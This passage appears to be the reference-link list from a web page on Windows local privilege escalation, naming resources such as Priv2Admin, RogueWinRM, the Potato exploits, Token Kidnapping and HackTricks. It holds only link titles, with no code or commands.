new tab. Priv22admin, Abusing Windows Privileges, opens in new tab. Rogue One RM Exploit, opens in new tab. Potatoes opens in new tab. Decoder's Blog opens in new tab. Token Kidnapping opens in new tab. Hacktricks, Windows Local Privilege Escalation.